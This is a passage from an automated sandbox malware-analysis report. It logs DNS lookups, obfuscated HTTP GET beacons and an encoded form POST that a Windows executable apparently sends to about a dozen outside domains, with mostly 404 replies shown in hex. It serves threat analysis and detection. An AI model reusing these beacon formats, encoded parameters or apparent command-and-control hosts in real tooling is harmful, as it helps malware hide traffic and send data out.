            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?-NnllVvH=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&e6mhx=LZwxPLrhqt_8A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?-NnllVvH=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?-NnllVvH=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&e6mhx=LZwxPLrhqt_8A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?-NnllVvH=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?-NnllVvH=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&e6mhx=LZwxPLrhqt_8A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.nobartv6.website
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 68 62 58 62 50 76 38 4f 73 4c 6a 43 41 63 70 71 6d 51 4f 6f 31 57 70 61 75 35 41 4e 48 76 56 73 67 3d 3d Data Ascii: -NnllVvH=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 14:34:38 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 14:34:41 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 14:34:44 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 14:34:46 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 14:34:52 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 14:34:55 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 14:34:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 14:35:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 14:35:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 